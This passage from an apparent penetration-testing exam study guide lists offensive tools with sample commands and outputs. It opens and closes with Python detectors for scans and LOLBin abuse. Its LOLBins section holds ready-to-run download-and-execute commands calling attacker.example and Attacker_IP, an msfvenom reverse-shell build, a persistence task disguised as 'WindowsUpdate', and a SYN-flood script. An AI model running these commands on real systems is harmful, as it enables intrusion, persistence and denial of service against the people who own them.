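    """Largest number of events that fall inside any interval of length `window`."""
    ts = sorted(timestamps)
    best = left = 0
    for right in range(len(ts)):
        while ts[right] - ts[left] > window:
            left += 1
        best = max(best, right - left + 1)
    return best


def detect_content_discovery(lines, window=timedelta(seconds=10), threshold=20):
    """Return {ip: [reasons]} for clients whose 404 burst or user agent looks like a wordlist scan."""
    per_ip = defaultdict(lambda: {"not_found": [], "agents": set()})
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        bucket = per_ip[rec["ip"]]
        bucket["agents"].add(rec["ua"])
        if rec["status"] == 404:
            bucket["not_found"].append(rec["ts"])
    findings = {}
    for ip, bucket in per_ip.items():
        reasons = []
        peak = peak_in_window(bucket["not_found"], window)
        if peak >= threshold:
            reasons.append(f"{peak} responses with status 404 inside {int(window.total_seconds())}s")
        agents = sorted(ua for ua in bucket["agents"] if ua.startswith(SCANNER_UA_PREFIXES))
        if agents:
            reasons.append("scanner user agent: " + ", ".join(agents))
        if reasons:
            findings[ip] = reasons
    return findings


def constructed_access_log():
    """Constructed sample: one wordlist scan (30 requests in 4.5 s) and one ordinary visitor."""
    base = datetime(2025, 11, 9, 13, 36, 0, tzinfo=timezone.utc)
    lines = []
    for i in range(30):
        ts = (base + timedelta(milliseconds=150 * i)).strftime(TS_FORMAT)
        status = 301 if i in (3, 11, 19, 27) else 404   # four real directories, the rest misses
        lines.append(f'10.10.14.5 - - [{ts}] "GET /dir{i:02d} HTTP/1.1" {status} 278 "-" "gobuster/3.6"')
    for i, path in enumerate(["/", "/css/style.css", "/js/app.js", "/images/logo.png", "/favicon.ico"]):
        ts = (base + timedelta(seconds=2 * i)).strftime(TS_FORMAT)
        status = 404 if path == "/favicon.ico" else 200
        lines.append(f'192.168.1.20 - - [{ts}] "GET {path} HTTP/1.1" {status} 1365 "-" '
                     '"Mozilla/5.0 (X11; Linux x86_64) Firefox/128.0"')
    return lines


if __name__ == "__main__":
    for ip, reasons in detect_content_discovery(constructed_access_log()).items():
        print(ip, "->", "; ".join(reasons))
```

The window/threshold pair is the tuning knob: a single stray 404 from a browser fetching `favicon.ico` never trips it, while a scan at Wfuzz's 571 requests per second crosses it in well under a second. Tools that use `--hc`/`--hw`-style filtering on the attacker side change nothing here, since the filtering happens after the server has already logged the miss.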
    
    

24. WPScan

  • Use Case: WordPress enumeration & vuln checks. Github

  • Input Example:

    wpscan --update
    
    wpscan --url http://wpscan.thm --enumerate t
    
    wpscan --url http://wpscan.thm --enumerate p
    
    wpscan --url http://wpscan.thm/wp-login.php -P /usr/share/wordlists/rockyou.txt -U phreakazoid
    
    
    Enumeration Process:
      	  Available Choices:
      	   vp   Vulnerable plugins
      	   ap   All plugins
      	   p    Popular plugins
      	   vt   Vulnerable themes
      	   at   All themes
      	   t    Popular themes
      	   tt   Timthumbs
      	   cb   Config backups
      	   dbe  Db exports
      	   u    User IDs range. e.g: u1-5
      			Range separator to use: '-'
      			Value if no argument supplied: 1-10
      	   m    Media IDs range. e.g m1-15
      			Note: Permalink setting must be set to "Plain" for those to be detected
      			Range separator to use: '-'
      			Value if no argument supplied: 1-100
      	  Separator to use between the values: ','
      	  Default: All Plugins, Config Backups
      	  Value if no argument supplied: vp,vt,tt,cb,dbe,u,m
      	  Incompatible choices (only one of each group/s can be used):
      	   - vp, ap, p
      	   - vt, at, t
    
    
  • Output Example:

    [+] URL: http://wpscan.thm/ [10.10.196.194]
    [+] Started: Sun Nov  9 13:36:06 2025
    
    Interesting Finding(s):
    
    [+] Headers
     | Interesting Entry: Server: Apache/2.4.29 (Ubuntu)
     | Found By: Headers (Passive Detection)
     | Confidence: 100%
    
    [...] 
    [+] WordPress readme found: http://wpscan.thm/readme.html
     | Found By: Direct Access (Aggressive Detection)
     | Confidence: 100%
    
    [...]   
    [i] Theme(s) Identified:
    [+] twentynineteen
     | Location: http://wpscan.thm/wp-content/themes/twentynineteen/
     | Last Updated: 2025-04-15T00:00:00.000Z
     | Readme: http://wpscan.thm/wp-content/themes/twentynineteen/readme.txt
     | [!] The version is out of date, the latest version is 3.1
    
    
    
    [...]
    [+] Enumerating Most Popular Plugins (via Passive Methods)
    [+] Checking Plugin Versions (via Passive and Aggressive Methods)
    
    [i] Plugin(s) Identified:
    
    [+] nextcellent-gallery-nextgen-legacy
     | Location: http://wpscan.thm/wp-content/plugins/nextcellent-gallery-nextgen-legacy/
     | Latest Version: 1.9.35 (up to date)
     | Last Updated: 2017-10-16T09:19:00.000Z
     |
     | Found By: Comment (Passive Detection)
     |
     | Version: 3.5.0 (60% confidence)
     | Found By: Comment (Passive Detection)
     |  - http://wpscan.thm/, Match: '<meta name="NextGEN" version="3.5.0"'
    
    [...]
    
    
    
    [...]
    [+] Performing password attack on Wp Login against 1 user/s
    [SUCCESS] - phreakazoid / linkinpark                                                                                                      
    Trying phreakazoid / marlon Time: 00:00:06 <                                                      > (505 / 14344896)  0.00%  ETA: ??:??:??
    
    [!] Valid Combinations Found:
     | Username: phreakazoid, Password: linkinpark
    [...]
    
    

25. Pacu

  • Use Case: AWS exploitation framework (IAM, S3, EC2 attacks).

  • Input Example:

    pacu
    run iam__enum_permissions
    run s3__bucket_finder
    
  • Output Example:

    PrivEsc path found via inline policy...
    Public S3 bucket: acme-logs
    

26. Docker Bench

  • Use Case: Docker host/container security baseline checks.

  • Input Example:

    docker run --net host --pid host --userns host --cap-add audit_control \
      -e DOCKER_CONTENT_TRUST=1 --label docker_bench_security \
      -v /etc:/etc:ro -v /usr/bin/docker-containerd:/usr/bin/docker-containerd:ro \
      -v /var/lib:/var/lib:ro -v /var/run/docker.sock:/var/run/docker.sock:ro \
      docker/docker-bench-security
    
  • Output Example:

    [WARN] 1.1 Ensure a separate partition for /var/lib/docker
    [PASS] 1.2 Ensure only trusted users can control Docker
    

27. Prowler

  • Use Case: AWS CIS benchmark & best‑practice auditing.

  • Input Example:

    prowler -M csv,json -S -q
    
  • Output Example:

    PASS 1.2 Ensure multi-factor auth enabled for root account
    FAIL 2.1 S3 buckets should not allow public read access: acme-logs
    

28. ScoutSuite

  • Use Case: Multi‑cloud posture assessment (AWS/Azure/GCP).

  • Input Example:

    scoutsuite aws --profile pentest
    
  • Output Example:

    Findings: 3 Critical (Public S3, Open SG 0.0.0.0/0, Unrotated keys)
    

29. WPAD

  • Use Case: Proxy auto‑discovery abuse for credential capture/traffic redir.

  • Input Example:

    responder -I eth0 -wF
    
  • Output Example:

    WPAD rogue proxy auth attempt captured - NTLMv2 hash for ACME\jdoe
    

30. WiFi‑Pumpkin

  • Use Case: Evil twin AP/captive portal phishing.

  • Input Example:
    Configure SSID clone → start rogue AP with portal template.

  • Output Example:

    Credential captured: [email protected] password=P@ss123!
    

31. Kismet

  • Use Case: Wireless discovery, packet capture, IDS features, detect hidden networks and rogue APs. Github

  • Input Example:

    sudo kismet --source=wlan0mon:channel=44
    
  • Output Example: Images

    INFO: Including sub-config file: /etc/kismet/kismet_httpd.conf
    INFO: Including sub-config file: /etc/kismet/kismet_memory.conf
    INFO: Including sub-config file: /etc/kismet/kismet_alerts.conf
    INFO: Including sub-config file: /etc/kismet/kismet_80211.conf
    INFO: Including sub-config file: /etc/kismet/kismet_logging.conf
    INFO: Including sub-config file: /etc/kismet/kismet_filter.conf
    INFO: Including sub-config file: /etc/kismet/kismet_uav.conf
    [...]
    KISMET - Point your browser to http://localhost:2501 (or the address of this system) for the Kismet UI
    INFO: Detected new 802.11 Wi-Fi device 1C:F2:9A:28:F1:3E
    INFO: Detected new 802.11 Wi-Fi access point EC:FC:2F:03:2C:A8
    INFO: 802.11 Wi-Fi device EC:FC:2F:03:2C:A8 advertising SSID 
        '[REDACTED]'
    INFO: Detected new 802.11 Wi-Fi device EC:B5:FA:16:DB:5A
    INFO: Detected new 802.11 Wi-Fi device A8:29:48:33:79:E9
    [...]  
    ALERT: BCASTDISCON IEEE80211 Access Point BSSID 70:3A:51:0B:72:3C 
           broadcast deauthentication or disassociation of all clients; Either 
           the AP is shutting down or this is indicative of a possible denial 
           of service attack.
    INFO: Detected new 802.11 Wi-Fi device EE:76:BD:2F:30:13
    INFO: Detected new 802.11 Wi-Fi device 4C:F5:DC:E4:35:D1
    [...]
    
    

32. Social Engineering Toolkit (SET)

  • Use Case: Phishing pages, credential capture, payload delivery (with consent). Github

  • Input Example:

    set  
    
      # SET Command line. Options:
      1) Social-Engineering Attacks
      	1) Spear-Phishing Attack Vectors
      		1) Perform a Mass Email Attack
      			> Choose your payload, choice of 22 (e.g., Adobe PDF, Microsoft Word)
      			> Choose what type of shell you want (e.g., reverse TCP, meterpreter)
      			> Set IP of payload listener: <ENTER> for localhost
      			> Set port to connect back on: <DEFAULT 443>
      			> Rename the filename of the payload
      			> Next, choose either:
      			1) E-mail Attack Single Email Address
      				1) Pre-Defined Template
      				2) One-Time Use Email Template
      					> Enter the subject of the email
      					> Choose HTML or plain text message type
      					> Enter the body of the message
      					> Set email recipient
      					> Next, choose to send via
      						1) Gmail account
      						2) Use your own server or open relay
      							> Enter the FROM address
      							> Enter the FROM name
      							> Enter username for open relay: <BLANK> default
      							> Enter the server we are using (e.g., smtp.myserver.com)
      							> Enter port number for the SMTP server
      							> Flag message as high priority Y/N
      							> Set up a listener Y/N: Yes							
      			2) E-mail Attack Mass Mailer
      		2) Create a FileFormat Payload
      		3) Create a Social-Engineering Template
      		99) Return to Main Menu
      	2) Website Attack Vectors
      		1) Java Applet Attack Method
      		2) Metasploit Browser Exploit Method
      		3) Credential Harvester Attack Method
      			1) Web Templates
      			2) Site Cloner
      				> Enter IP address of site (where it will be hosted): <ENTER> for localhost
      				> Enter the URL to clone (e.g., facebook.com)
      				> Go to fake website to confirm it is live
      				> Watch the visits roll in!
      			3) Custom Import
      			99) Return to the Webattack Menu
      		4) Tabnabbing Attack Method
      		5) Web Jacking Attack Method
      		6) Multi-Attack Web Method
      		7) HTA Attack Method
      		99) Return to the Main Menu
      	3) Infectious Media Generator
      	4) Create a Payload and Listener
      	5) Mass Mailer Attack
      	6) Arduino-Based Attack Vector
      	7) Wireless Access Point Attack Vector
      	8) QRCode Generator Attack Vector
      	9) Powershell Attack Vectors
      	10) Third Party Modules
      	99) Return back to the main menu
      2) Penetration Testing (Fast-Track)
      3) Third party modules
      4) Update the Social-Engineer Toolkit
      5) Update SET configuration
      6) Help, Credits, and About
      99) Exit the Social-Engineering Toolkit
    
    
  • Output Example:

    Credential captured: [email protected] : Summer2025!
    

33. Gophish

  • Use Case: Web-based framework for phishing campaigns with tracking & reporting. Git Repo

  • Input Example:

    
    1. Sending Profiles (SMTP config) →  New Profile
    2. Landing Page → New Page + Capture Submitted data and passwords
    3. Email Templates → New Template
    4. Users & Groups (email recipients) → New Group
    5. Campaigns → New Campaign → Launch Campaign (send to target group) → Track results (Emails sent, opened, and clicked)
    
    
  • Output Example: Images

    Emails Sent: 25 | Opened: 18 | Clicked: 5 | Submitted data: 2 (Option to replay the captured credentials to a URL)
    

34. Evilginx

  • Use Case: Reverse proxy phishing to capture session cookies (MFA‑bypass testing).

  • Input Example:

    evilginx -p phishlets
    phishlets enable microsoft
    lures create microsoft
    
  • Output Example:

    Captured session cookie for user [email protected]
    

35. Browser Exploitation Framework (BeEF)

  • Use Case: Browser hook & client‑side attack delivery: steal cookies, capture keystrokes, take screenshots and perform network reconnaissance.

  • Input Example:
    Serve hook.js → victim loads page → control via BeEF UI.

  • Output Example:

    New hooked browser: 10.10.10.44 (Chrome 118)
    

36. Scapy

  • Use Case: Packet crafting/fuzzing (L2–L7), protocol experiments. GitHub

  • Input Example:

    # Use the scapy python module to send a SYN packet (raw sockets require root)
    from scapy.all import *
    
    # Create IP layer
    ip_layer = IP()
    ip_layer.dst = "192.168.1.1"
    ip_layer.src = "192.168.1.100"
    
    # Create the TCP layer
    tcp_layer = TCP()
    tcp_layer.dport = 80
    tcp_layer.sport = 12345
    tcp_layer.flags = "S" # SYN flag
    
    # Combine the layers
    packet = ip_layer/tcp_layer
    
    # Send the packet at layer 3 (scapy adds the Ethernet header and routing)
    send(packet)
    
    # Print packet details; show() prints and returns None, so do not wrap it in print()
    packet.show()
    
    # ARP scan
    from scapy.all import *
    
    # Define the target network
    target_network = '10.211.55.0/24'
    
    # Craft an ARP request wrapped in an Ethernet broadcast frame
    arp_request = ARP(pdst=target_network)
    broadcast = Ether(dst="ff:ff:ff:ff:ff:ff")
    arp_request_broadcast = broadcast/arp_request
    
    # Send at layer 2 and collect the answered (sent, received) pairs
    answered_list = srp(arp_request_broadcast, timeout=1, verbose=False)[0]
    
    # Parse the responses
    for sent, received in answered_list:
        print(f"IP: {received.psrc} - MAC: {received.hwsrc}")
    
    # SYN flood
    from scapy.all import *
    
    # Define the target
    target_ip = '10.211.55.5'
    target_port = 80
    
    # Create a SYN packet
    syn_packet = IP(dst=target_ip)/TCP(dport=target_port, flags="S")
    
    # Send the SYN packets in a loop
    for i in range(1000):
      send(syn_packet, verbose=False)
     
    print("SYN flood attack completed.")
    
  • Output Example:

    .
    Sent 1 packets.
    

37. tcprelay

  • Use Case: iOS USB tunneling to expose services as TCP ports.

  • Input Example:

    tcprelay.py -t 22:2222
    
  • Output Example:

    Forwarding local 2222 -> remote 22
    

38. MobSF (Mobile Security Framework)

  • Use Case: Static/dynamic analysis of Android/iOS apps.

  • Input Example:
    Upload APK → Static analysis.

  • Output Example:

    Hardcoded secrets detected
    Debuggable: True
    Exported Activities: com.example.MainActivity
    

39. Frida

  • Use Case: Dynamic instrumentation/hook mobile and desktop apps.

  • Input Example:

    frida -U -f com.example.app -l bypass_ssl.js --no-pause
    
  • Output Example:

    [*] SSL pinning bypassed
    

40. Drozer

  • Use Case: Android app/IPC security testing.

  • Input Example:

    drozer console connect
    run app.package.list -f example
    
  • Output Example:

    com.example.app
    

41. Android Debug Bridge (ADB)

  • Use Case: Device control, app install, shell access.

  • Input Example:

    adb devices
    adb shell pm list packages | grep example
    
  • Output Example:

    List of devices attached
    emulator-5554 device
    package:com.example.app
    

42. Bluestrike

  • Use Case: Bluetooth assessment (enumeration/attacks) in some lab toolsets.

  • Input Example:

    bluestrike --scan
    
  • Output Example:

    Device: 00:1A:7D:DA:71:13  Name: BT-Speaker  Services: A2DP
    

43. Caldera (MITRE)

  • Use Case: Automated adversary emulation (ATT&CK‑mapped).

  • Input Example:
    Run an operation using the web UI → select agents & abilities.

  • Output Example:

    Operation completed: 14 techniques executed (T1059, T1047, T1105...)
    

44. Infection Monkey

  • Use Case: Self‑propagating assessment of segmentation & controls.

  • Input Example:
    Deploy monkey agent → set constraints → run.

  • Output Example:

    Lateral movement succeeded to 10.10.10.22 via SMB
    Blocked by firewall on 10.10.10.23
    

45. Atomic Red Team

  • Use Case: Small, testable ATT&CK “atoms” to validate detections.

  • Input Example:

    Invoke-AtomicTest T1059 -ShowDetailsBrief
    Invoke-AtomicTest T1059 -PromptForInputArgs
    
  • Output Example:

    Executed: T1059.001 PowerShell
    Result: Completed with exit code 0
    

46. PowerView

  • Use Case: Active Directory enumeration from PowerShell (users, groups, shares, computers).

  • Input Example:

    Import-Module .\PowerView.ps1
    Get-NetUser | Select-Object cn
    Get-NetGroup -GroupName *admin*
    Invoke-ShareFinder
    Get-NetComputer -FullData | Select-Object name, operatingsystem
    
  • Output Example:

    cn
    --
    Administrator
    Guest
    krbtgt
    Machine-1
    Admin2
    Machine-2
    SQL Service
    POST{P0W3RV13W_FTW}
    sshd

    Administrators
    Hyper-V Administrators
    Storage Replica Administrators
    Schema Admins
    Enterprise Admins
    Domain Admins
    Key Admins
    Enterprise Key Admins
    DnsAdmins

    \\Domain-Controller.CONTROLLER.local\ADMIN$     - Remote Admin
    \\Domain-Controller.CONTROLLER.local\C$         - Default share
    \\Domain-Controller.CONTROLLER.local\IPC$       - Remote IPC
    \\Domain-Controller.CONTROLLER.local\NETLOGON   - Logon server share
    \\Domain-Controller.CONTROLLER.local\Share      -
    \\Domain-Controller.CONTROLLER.local\SYSVOL     - Logon server share

    name            operatingsystem
    ----            ---------------
    DOMAIN-CONTROLL Windows Server 2019 Standard
    DESKTOP-2       Windows 10 Enterprise Evaluation
    DESKTOP-1       Windows 10 Enterprise Evaluation


47. PowerUpSQL

  • Use Case: Find SQL instances & privilege escalation opportunities. Git Repo / Cheat Sheet

  • Input Example:

    Import-Module .\PowerUpSQL.ps1
    Get-SQLInstanceLocal -Verbose
    Invoke-SQLAudit -Verbose -Instance WPERSISTENCE\SQLEXPRESS
    
  • Output Example:

    ComputerName       : WPERSISTENCE
    Instance           : WPERSISTENCE\SQLEXPRESS
    ServiceDisplayName : SQL Server (SQLEXPRESS)
    ServiceName        : MSSQL$SQLEXPRESS
    ServicePath        : "C:\Program Files\Microsoft SQL Server\MSSQL15.SQLEXPRESS\MSSQL\Binn\sqlservr.exe" -sSQLEXPRESS
    ServiceAccount     : NT Service\MSSQL$SQLEXPRESS
    State              : Running

    ComputerName  : WPERSISTENCE
    Instance      : WPERSISTENCE\SQLEXPRESS
    Vulnerability : Excessive Privilege - Execute xp_dirtree
    Description   : xp_dirtree is a native extended stored procedure that can be executed by members of the Public role by default in SQL Server 2000-2014. Xp_dirtree can
                    be used to force the SQL Server service account to authenticate to a remote attacker.  The service account password hash can then be captured + cracked
                    or relayed to gain unauthorized access to systems. This also means xp_dirtree can be used to escalate a lower privileged user to sysadmin when a
                    machine or managed account isnt being used.  Thats because the SQL Server service account is a member of the sysadmin role in SQL Server 2000-2014, by
                    default.
    Remediation   : Remove EXECUTE privileges on the XP_DIRTREE procedure for non administrative logins and roles.  Example command: REVOKE EXECUTE ON xp_dirtree to Public
    Severity      : Medium
    IsVulnerable  : Yes
    IsExploitable : Yes
    Exploited     : No
    ExploitCmd    : Crack the password hash offline or relay it to another system.
    Details       : The public principal has EXECUTE privileges on the xp_dirtree procedure in the master database.
    Reference     : https://blog.netspi.com/executing-smb-relay-attacks-via-sql-server-using-metasploit/
    Author        : Scott Sutherland (@_nullbind), NetSPI 2016


48. AD Search (RSAT cmdlets example)

  • Use Case: Query AD users/groups/computers to support auth & lateral-movement attacks.

  • Input Example:

    Get-ADUser -Filter * -Properties PasswordNeverExpires |
      Where-Object {$_.PasswordNeverExpires -eq $true} |
      Select-Object Name, Enabled
    
  • Output Example:

    Name             Enabled
    ----             -------
    svc_build        True
    legacy_admin     True

🧪 Quick “Flags & Tuning” Tips (Exam‑useful)

  • Hydra/Medusa: Add -t 4 (threads) and adjust timeouts for reliability.
  • hashcat: Choose the correct mode (e.g., -m 1000 for NTLM, -m 1800 for sha512crypt). Use rules with -r.
  • CME: Use --local-auth for local accounts; --sam / --lsa modules for dumping.
  • Impacket: getST.py, ticketer.py, wmiexec.py, dcomexec.py are frequent wins.
  • ZAP/WFuzz/Gobuster: Respect rate limits; ignore lengths/hide headers with --hh/filters.
  • Prowler/ScoutSuite: Run with least privilege creds; export HTML/JSON for reporting.
  • Pacu: Snapshot IAM before changes; cleanup to avoid resource drift.
  • Kismet/WiFi-Pumpkin: Use proper adapters with monitor/injection support.
  • Use Metasploit modules aligned with scope—avoid DoS exploits.
  • sqlmap flags like --risk and --level control depth of testing.
  • Burp Suite Intruder useful for fuzzing parameters.

Other tools

1. WinPEAS

  • Use Case: Privilege escalation auditing scripts that enumerate misconfigurations, vulnerabilities, and exploitable paths on Windows systems. Git Repo

2. LinPEAS / LinEnum

  • Use Case: Privilege escalation auditing scripts that enumerate misconfigurations, vulnerabilities, and exploitable paths on Linux systems. Git Repo

3. tar and zip

Tar and Zip are primarily used for:

  • Bundling multiple files (e.g., exploits, scripts, binaries) into one archive for easy transfer.
  • Compressing payloads to reduce size for faster upload/download.
  • Evading detection by changing file signatures or using password-protected archives.
  • Exfiltration of data from compromised systems in a single compressed archive.

Tar

Strengths:

- Native to Unix/Linux systems.
- Preserves file permissions and directory structure (important for scripts and configs).
- Works well with gzip or bzip2 for compression (.tar.gz, .tar.bz2).
- Fast for large sets of files.

Weaknesses:

- No built-in encryption or password protection.
- Less common on Windows (requires extra tools).
- Larger archives compared to zip when not compressed.

  • Input Example:
# Create an archive:

tar -cvf tools.tar exploit.sh payload.exe

# Output - 'a' means 'added'
a exploit.sh
a payload.exe
# List the contents without extracting

tar -tf tools.tar
# Compress with gzip:

tar -czvf tools.tar.gz exploit.sh payload.exe
# Extract:

tar -xvf tools.tar.gz

# Output - 'x' means 'extracted'
x exploit.sh
x payload.exe

zip

Strengths:

- Cross-platform (Windows, Linux, macOS).
- Supports password protection (basic, not strong encryption).
- Commonly accepted by email and file transfer systems.
- Built-in on Windows (Compress-Archive in PowerShell).

Weaknesses:

- Password protection is weak (ZIP crypto can be cracked easily).
- Does not preserve Unix permissions by default.
- Slightly slower for very large archives compared to tar.

  • Input Example:
# Create a zip archive:

zip tools.zip exploit.sh payload.exe
# Password-protect:

zip -e tools.zip exploit.sh payload.exe
# Extract:

unzip tools.zip

✅ Offensive Security Use Cases

- Payload Delivery: Compress payloads before uploading to a target.
- Data Exfiltration: Bundle stolen files into a single archive for quick transfer.
- Evasion: Use archives to bypass simple file-type filters.
- Staging: Package multiple scripts and binaries for deployment on compromised hosts.

🔐 Pro Tip for PT0-003

- Tar is often used in Linux privilege escalation scenarios (e.g., GTFOBins).
- Zip archives with weak passwords can be cracked using tools like fcrackzip or John the Ripper.

4. LOLBins

LOLBAS | GTFOBins

PowerShell

  • Official use case: Task automation and configuration management framework for Windows (and now cross-platform via PowerShell Core).

  • LOLBin use case: In 2019, Red Canary published a threat detection report stating that PowerShell is the most used technique for malicious activities.

  • Input Example:

powershell -NoP -NonI -W Hidden -Exec Bypass -Command "IEX (New-Object System.Net.WebClient).DownloadString('http://attacker.example/payload.ps1')"
PS> $username = 't1_leonard.summers';
PS> $password = 'EZpass4ever';
PS> $securePassword = ConvertTo-SecureString $password -AsPlainText -Force;
PS> $credential = New-Object System.Management.Automation.PSCredential $username, $securePassword;
PS> Enter-PSSession -Computername thmiis.za.tryhackme.com -Credential $credential
[thmiis.za.tryhackme.com]: PS C:\Users\t1_leonard.summers\Documents> whoami                                     
za\t1_leonard.summers                                                                                           
[thmiis.za.tryhackme.com]: PS C:\Users\t1_leonard.summers\Documents>

powershell — launches PowerShell.
-NoP (-NoProfile) — does not load the user’s profile scripts, reducing noise and speeding startup.
-NonI (-NonInteractive) — runs non‑interactively (no prompts).
-W Hidden (-WindowStyle Hidden) — starts with the console window hidden (less visible to the user).
-Exec Bypass — sets ExecutionPolicy to Bypass for this process only, allowing scripts to run regardless of the machine’s policy.
-Command " ... " — tells PowerShell to run the following command string.
IEX — alias for Invoke-Expression, which evaluates and executes the string you pass to it as code.
(New-Object System.Net.WebClient).DownloadString('http://attacker.example/payload.ps1') — uses .NET’s WebClient to download the contents of the remote file and return it as a string.
Putting it together: IEX(<downloaded string>) executes the downloaded script directly in memory (a “fileless” technique).


MSBuild

  • Official use case: Build .NET applications and libraries.

  • LOLBin use case: File Execution - Execute payloads hidden inside .NET project files. PowerlessShell

  • Input Example:

# Create a powershell payload
msfvenom -p windows/meterpreter/reverse_winhttps LHOST=AttackBox_IP LPORT=4443 -f psh-reflection > liv0ff.ps1

# Convert with PowerlessShell to a payload compatible with the MSBuild tool
python2 PowerLessShell.py -type powershell -source /tmp/liv0ff.ps1 -output liv0ff.csproj

# Build it with msbuild
c:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe c:\Users\thm\Desktop\liv0ff.csproj

  • Output Example:

Microsoft (R) Build Engine version 4.8.3761.0
[Microsoft .NET Framework, version 4.0.30319.42000]
Copyright (C) Microsoft Corporation. All rights reserved.

Build started 11/10/2025 3:42:47 PM.


Explorer

  • Official use case: File manager and system component for Windows.

  • LOLBin use case: File Execution - Execute other .exe files, a technique known as Indirect Command Execution.

  • Input Example:

explorer.exe /root,"C:\Windows\System32\calc.exe"
  • Output Example: Calculator on the desktop.

WMIC

  • Official use case: Windows Management Instrumentation Command-line (WMIC) is a Windows command-line utility that manages Windows components.

  • LOLBin use case: File Execution - Execute binaries for evading defensive measures.

  • Input Example:

wmic /node:TARGETHOST process call create "powershell -NoP -Command IEX(New-Object Net.WebClient).DownloadString('http://attacker.example/payload.ps1')"
wmic.exe /user:Administrator /password:Mypass123 /node:TARGET process call create "cmd.exe /c calc.exe"
wmic /node:TARGETHOST process get name,commandline
wmic /node:TARGETHOST /user:DOMAIN\USER product call install PackageLocation=c:\Windows\myinstaller.msi
wmic.exe process call create calc
  • Output Example:

Node - 10.10.74.154
ERROR:
Description = The RPC server is unavailable.


Executing (Win32_Process)->Create()
Method execution successful.
Out Parameters:
instance of __PARAMETERS
{
        ProcessId = 4008;
        ReturnValue = 0;
};


CertUtil

  • Official use case: Retrieve certificate information. Microsoft Documentation

  • LOLBin use case: File Operations - Transfer and encode files unrelated to certification services.

  • Input Example:

certutil -urlcache -split -f "http://attacker.example/payload.exe" C:\Users\Public\payload.exe
certutil -decode C:\Users\Public\encoded.b64 C:\Users\Public\decoded.exe
certutil -encode C:\Users\Public\decoded.exe C:\Users\Public\encoded.b64
  • Output Example:
Input Length = 52
Output Length = 38
CertUtil: -decode command completed successfully.

BITSAdmin

  • Official use case: Create, download or upload Background Intelligent Transfer Service (BITS) jobs and check their progress. Microsoft Documentation

  • LOLBin use case: File Operations - Download and execute a malicious payload in a compromised machine.

  • Input Example:

bitsadmin.exe /transfer /Download /priority Foreground http://Attacker_IP/payload.exe c:\Users\thm\Desktop\payload.exe
  • Output Example:
DISPLAY: '/Download' TYPE: DOWNLOAD STATE: TRANSFERRED
PRIORITY: FOREGROUND FILES: 1 / 1 BYTES: 73802 / 73802 (100%)
Transfer complete.

FindStr

  • Official use case: Find text and string patterns in files. Microsoft Documentation

  • LOLBin use case: File Operations - Download remote files from SMB shared folders within the network.

  • Input Example:

findstr /V dummystring \\MachineName\ShareFolder\test.exe > c:\Windows\Temp\test.exe

MSHTA

  • Official use case: Microsoft HTML Application host (mshta.exe) runs .hta files.

  • LOLBin use case: File Execution - Run an HTA or inline script from a remote URL, a javascript: URI or a local file.

  • Input Example:
mshta "http://attacker.example/payload.hta"
mshta "javascript:var s=new ActiveXObject('WScript.Shell');s.Run('powershell -NoP -NonI -W Hidden -Command "Start-Process calc.exe"');close();"
mshta "C:\Users\Public\malicious.hta"

rundll32

  • Official use case: Rundll32 is a Microsoft built-in tool that loads and runs Dynamic Link Library (DLL) files within the operating system.

  • LOLBin use case: File Execution - Run arbitrary payloads and execute JavaScript and PowerShell scripts.

  • Input Example:

# Start a payload, no visible output
rundll32.exe C:\Windows\Temp\payload.dll,Start
# Open a url hosted on the attacker machine, using the system's default protocol handler.
rundll32.exe url.dll,FileProtocolHandler "http://attacker.example/update.html"
# Run calculator using javascript
rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new ActiveXObject(\"WScript.Shell\");w.run(\"calc\");window.close()");
# Download a powershell script into memory
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://AttackBox_IP/script.ps1');");
  • Output Example:
Calculator on the desktop.
Powershell command window flashes up and immediately closes once the script has been downloaded.

Regsvr32

  • Official use case: Regsvr32 is a Microsoft command-line tool to register and unregister Dynamic Link Libraries (DLLs) in the Windows Registry.

  • LOLBin use case: Bypassing Application Whitelisting - Execute arbitrary binaries and bypass the Windows Application Whitelisting.

  • Input Example:

regsvr32.exe c:\Users\thm\Downloads\live0fftheland.dll
regsvr32.exe /s /n /u /i:http://example.com/file.sct Downloads\live0fftheland.dll

/s: in silent mode (without showing messages)
/n: to not call the DLL register server
/i:: to use another server since we used /n
/u: to run with unregister method

  • Output Example: If live0fftheland.dll is a meterpreter payload, then you can catch the meterpreter shell from the attacker box.

Bash

  • Official use case: As part of WSL, bash.exe is a Microsoft tool for interacting with the Linux environment.

  • LOLBin use case: Bypassing Application Whitelisting - Execute payloads and bypass the Windows application whitelisting since it is a Microsoft signed binary. This technique is known as Indirect Command execution.

  • Input Example:

bash.exe -c "path-to-payload"
  • Output Example: Requires the Linux subsystem enabled.

Scheduled tasks (schtasks / Task Scheduler)

  • Input Example:
schtasks /Create /SC ONLOGON /TN "WindowsUpdate" /TR "powershell -NoP -NonI -Exec Bypass -Command \"IEX (New-Object Net.WebClient).DownloadString('http://attacker.example/ps1')\""
schtasks /Create /SC DAILY /TN "DailyJob" /TR "C:\Users\Public\encrypt.ps1" /ST 00:05
schtasks /Run /TN "WindowsUpdate"
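As an added example (not part of the original post), here is a small Python detector that applies the LOLBin patterns from the entries above, from the PowerShell download-cradle flags through certutil, bitsadmin, mshta, rundll32, regsvr32, wmic and schtasks, to process-creation command lines such as Sysmon Event ID 1 or Windows 4688 records. The sample events, host names and user names are constructed; the suspicious command lines reuse the placeholder hosts shown on this page.

```python
"""Flag the LOLBin invocation patterns listed above in process-creation events."""
import re
from typing import Dict, List

# (rule_id, severity, regex applied to the normalised command line).
# Patterns follow the invocations shown on this page; hosts and paths are placeholders.
LOLBIN_RULES = [
    ("ps_download_cradle", "high",
     r"\b(iex|invoke-expression)\b.*(downloadstring|downloadfile)"
     r"|(downloadstring|downloadfile).*\|\s*(iex|invoke-expression)\b"),
    ("ps_hidden_bypass", "medium",
     r"powershell.*(-w(indowstyle)?\s+hidden|-exec(utionpolicy)?\s+bypass)"),
    ("certutil_download", "high", r"certutil.*-urlcache.*https?://"),
    ("certutil_encode", "medium", r"certutil.*-(en|de)code\b"),
    ("bitsadmin_download", "high", r"bitsadmin.*/transfer.*https?://"),
    ("mshta_exec", "high", r"mshta.*(https?://|javascript:|vbscript:|\.hta\b)"),
    ("rundll32_script", "high", r"rundll32.*(javascript:|url\.dll,fileprotocolhandler)"),
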